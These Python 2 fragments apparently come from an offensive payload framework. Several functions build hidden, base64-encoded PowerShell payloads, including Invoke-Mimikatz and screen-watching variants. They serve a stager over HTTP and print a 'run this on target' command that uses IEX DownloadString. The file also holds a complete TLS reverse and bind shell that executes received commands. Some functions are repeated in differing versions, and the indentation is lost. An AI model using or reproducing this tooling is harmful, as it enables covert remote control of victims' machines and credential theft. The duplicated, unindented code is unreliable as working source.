def reversePowerShellInvokeMimikatzGeneration(payloadchoice, payloadname):
portnum, ipaddr = reverseIpAndPort('4444')
shellcode = payloadchoice % (ipaddr, portnum)
powershellExec = 'powershell.exe -WindowStyle Hidden -enc %s' % (
base64.b64encode(shellcode.encode('utf_16_le')))
print t.bold_green + '\n[*] Powershell Has Been Generated' + t.normal
checkClientUpload(payloadname, powershellExec, isExe=False)
from listener import Server
listenerserver = Server('0.0.0.0', int(portnum), bindsocket=True)
async = threading.Thread(target=asyncore.loop, args=(0.1, ))
async .setDaemon(True)
async .start()
print 'waiting for connection...\nCTRL + C when done\n'
try:
while not listenerserver.handlers:
time.sleep(0.5)
while listenerserver:
if listenerserver.handlers[1].in_buffer:
print listenerserver.handlers[1].in_buffer.pop()
except KeyboardInterrupt:
if listenerserver.handlers:
listenerserver.handlers[1].handle_close()
listenerserver.close()
del listenerserver
return "pass"
def printListener(printit=True, returnit=False):
from listener import Server
from menu import returnIP
powershellFileName = 'p.ps1'
while True:
bindOrReverse = prompt_toolkit.prompt('[?] (b)ind/(r)everse: ',
patch_stdout=True,
completer=WordCompleter(
['b', 'r'])).lower()
if bindOrReverse == 'b' or bindOrReverse == 'r':
break
if bindOrReverse == 'r':
powershellContent = open('lib/powershell/stager.ps1', 'r').read()
windows_powershell_stager = powershellContent % ('False', returnIP(),
'5555')
if bindOrReverse == 'b':
powershellContent = open('lib/powershell/stager.ps1', 'r').read()
windows_powershell_stager = powershellContent % ('True', '', '5556')
with open((payloaddir() + '/' + powershellFileName),
'w') as powershellStagerFile:
powershellStagerFile.write(windows_powershell_stager)
powershellStagerFile.close()
randoStagerDLPort = FUNCTIONS().randomUnusedPort()
FUNCTIONS().DoServe(returnIP(),
powershellFileName,
payloaddir(),
port=randoStagerDLPort,
printIt=False)
stagerexec = 'powershell -w hidden -noni -enc ' + (
"IEX (New-Object Net.Webclient).DownloadString('http://" + returnIP() +
":" + str(randoStagerDLPort) + "/" + powershellFileName +
"')").encode('utf_16_le').encode('base64').replace('\n', '')
if printit:
print t.bold_green + '[!] Run this on target machine...' + t.normal + '\n\n' + stagerexec + '\n'
if bindOrReverse == 'b':
if not '5556' in str(serverlist):
ipADDR = raw_input(
'[?] IP Address of target (after executing stager): ')
connectserver = Server(ipADDR, 5556, bindsocket=False)
serverlist.append(connectserver)
if bindOrReverse == 'r':
if not '5555' in str(serverlist):
listenerserver = Server('0.0.0.0', 5555, bindsocket=True)
serverlist.append(listenerserver)
if returnit:
return stagerexec
else:
return "pass"
def printListener():
from listener import Server
while True:
bindOrReverse = raw_input(t.bold_green + '[?] (b)ind/[r]everse/(m)anual: ' + t.normal).lower()
if bindOrReverse == 'b' or bindOrReverse == 'r' or bindOrReverse == 'm':
break
if bindOrReverse == 'r':
powershellContent = open('lib/powershell/stager.ps1', 'r').read()
windows_powershell_stager = powershellContent % ('False', FUNCTIONS().CheckInternet(), '5555')
if bindOrReverse == 'b':
powershellContent = open('lib/powershell/stager.ps1', 'r').read()
windows_powershell_stager = powershellContent % ('True', '', '5556')
if bindOrReverse == 'm':
manualIP = raw_input(t.bold_green + '[?] IP Addr: ' + t.normal).lower()
powershellContent = open('lib/powershell/stager.ps1', 'r').read()
windows_powershell_stager = powershellContent % ('False', manualIP, '5555')
powershellFileName = 'p.ps1'
with open((payloaddir()+ '/' + powershellFileName), 'w') as powershellStagerFile:
powershellStagerFile.write(windows_powershell_stager)
powershellStagerFile.close()
randoStagerDLPort = random.randint(5000,9000)
if bindOrReverse == 'm':
FUNCTIONS().DoServe(manualIP, powershellFileName, payloaddir(), port=randoStagerDLPort, printIt = False)
print 'powershell -w hidden -noni -enc ' + ("IEX (New-Object Net.Webclient).DownloadString('http://" + manualIP + ":" + str(randoStagerDLPort) + "/" + powershellFileName + "')").encode('utf_16_le').encode('base64').replace('\n','')
else:
FUNCTIONS().DoServe(FUNCTIONS().CheckInternet(), powershellFileName, payloaddir(), port=randoStagerDLPort, printIt = False)
print 'powershell -w hidden -noni -enc ' + ("IEX (New-Object Net.Webclient).DownloadString('http://" + FUNCTIONS().CheckInternet() + ":" + str(randoStagerDLPort) + "/" + powershellFileName + "')").encode('utf_16_le').encode('base64').replace('\n','')
if bindOrReverse == 'b':
if not '5556' in str(serverlist):
ipADDR = raw_input(t.bold_green + '[?] IP After Run Bind Shell on Target: ' + t.normal)
connectserver = Server(ipADDR, 5556, bindsocket=False)
serverlist.append(connectserver)
if bindOrReverse == 'r':
if not '5555' in str(serverlist):
listenerserver = Server('0.0.0.0', 5555, bindsocket=True)
serverlist.append(listenerserver)
if bindOrReverse == 'm':
if not '5555' in str(serverlist):
listenerserver = Server(manualIP, 5555, bindsocket=True)
serverlist.append(listenerserver)
return "pass"
def reversePowerShellWatchScreenGeneration(payloadchoice,payloadname):
portnum,ipaddr = reverseIpAndPort('4444')
shellcode = payloadchoice % (ipaddr,portnum)
powershellExec = 'powershell.exe -WindowStyle Hidden -enc %s'%(base64.b64encode(shellcode.encode('utf_16_le')))
print t.bold_green + '\n[*] Powershell Has Been Generated' + t.normal
checkClientUpload(payloadname,powershellExec,isExe=False)
from listener import Server
listenerserver = Server('0.0.0.0', int(portnum), bindsocket=True)
relayserver = Server('127.0.0.1', 8081, relay=True)
os.system('firefox 127.0.0.1:8081')
print 'waiting for connection...\nCTRL + C when done\n'
try:
while not listenerserver.handlers:
time.sleep(0.5)
while listenerserver:
if listenerserver.handlers[1].in_buffer:
relayserver.handlers[1].out_buffer.append(listenerserver.handlers[1].in_buffer.pop())
except KeyboardInterrupt:
if listenerserver.handlers:
listenerserver.handlers[1].handle_close()
return "pass"
def printListener():
from listener import Server
while True:
bindOrReverse = raw_input(t.bold_green + '[?] (b)ind/[r]everse: ' +
t.normal).lower()
if bindOrReverse == 'b' or bindOrReverse == 'r':
break
if bindOrReverse == 'r':
windows_powershell_stager = (
"$c = New-Object System.Net.Sockets.TCPClient('" +
FUNCTIONS().CheckInternet() + "','5555');"
"$b = New-Object Byte[] 10500;"
"$sl = New-Object System.Net.Security.SslStream $c.GetStream(),$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]);"
"$sl.AuthenticateAsClient($env:computername);"
"if ((New-Object Security.Principal.WindowsPrincipal ([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)){$ia = 'True'}else{$ia = 'False'};"
"$h = \"`0\" + \"`0\" + \"[#check#]\" + $env:computername + ':' + $ia;"
"$he = ([text.encoding]::ASCII).GetBytes($h,0,$h.Length);"
"$sl.Write($he);"
"while(1){$i = $sl.Read($b, 0, $b.Length);"
"if ($i -lt 1){exit};"
"$sb = New-Object -TypeName System.Text.ASCIIEncoding;"
"$d = $sb.GetString($b,0, $i);"
"if ($d.Length -gt 0){$cb = (iex -c $d 2>&1 | Out-String)};"
"if ($error[0]){$cb = \"`0\" + ($error[0] | Out-String);$error.clear()};"
"$sb = ([text.encoding]::ASCII).GetBytes($cb);"
"$sl.Write($sb,0,$sb.Length);"
"$sl.Flush()}")
else:
windows_powershell_stager = (
"$Base64Cert = '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';"
"$CertPassword = '******';"
"$b = New-Object Byte[] 10500;"
"$SSLcertfake = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2([System.Convert]::FromBase64String($Base64Cert), $CertPassword);"
"$listener = [System.Net.Sockets.TcpListener]5556;"
"$listener.start();"
"$client = $listener.AcceptTcpClient();"
"$stream = $client.GetStream();"
"$sl = New-Object System.Net.Security.SslStream $stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]);"
"$sl.AuthenticateAsServer($SSLcertfake, $false, [System.Security.Authentication.SslProtocols]::Tls, $false);"
"if ((New-Object Security.Principal.WindowsPrincipal ([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)){$ia = 'True'}else{$ia = 'False'};"
"$h = \"`0\" + \"`0\" + \"[#check#]\" + $env:computername + ':' + $ia;"
"$he = ([text.encoding]::ASCII).GetBytes($h,0,$h.Length);"
"$sl.Write($he);"
"while(1){$i = $sl.Read($b, 0, $b.Length);"
"if ($i -lt 1){exit};"
"$sb = New-Object -TypeName System.Text.ASCIIEncoding;"
"$d = $sb.GetString($b,0, $i);"
"if ($d.Length -gt 0){$cb = (iex -c $d 2>&1 | Out-String)};"
"if ($error[0]){$cb = \"`0\" + ($error[0] | Out-String);$error.clear()};"
"$sb = ([text.encoding]::ASCII).GetBytes($cb);"
"$sl.Write($sb,0,$sb.Length);"
"$sl.Flush()}")
powershellFileName = 'p.ps1'
with open((payloaddir() + '/' + powershellFileName),
'w') as powershellStagerFile:
powershellStagerFile.write(windows_powershell_stager)
powershellStagerFile.close()
randoStagerDLPort = random.randint(5000, 9000)
FUNCTIONS().DoServe(FUNCTIONS().CheckInternet(),
powershellFileName,
payloaddir(),
port=randoStagerDLPort,
printIt=False)
print 'powershell -w hidden -noni -enc ' + (
"IEX (New-Object Net.Webclient).DownloadString('http://" +
FUNCTIONS().CheckInternet() + ":" + str(randoStagerDLPort) + "/" +
powershellFileName +
"')").encode('utf_16_le').encode('base64').replace('\n', '')
if bindOrReverse == 'b':
if not '5556' in str(serverlist):
ipADDR = raw_input(t.bold_green +
'[?] IP After Run Bind Shell on Target: ' +
t.normal)
connectserver = Server(ipADDR, 5556, bindsocket=False)
serverlist.append(connectserver)
async = threading.Thread(target=asyncore.loop, args=(0.1, ))
async .setDaemon(True)
async .start()
else:
if not '5555' in str(serverlist):
listenerserver = Server('0.0.0.0', 5555, bindsocket=True)
serverlist.append(listenerserver)
async = threading.Thread(target=asyncore.loop, args=(0.1, ))
async .setDaemon(True)
async .start()
return "pass"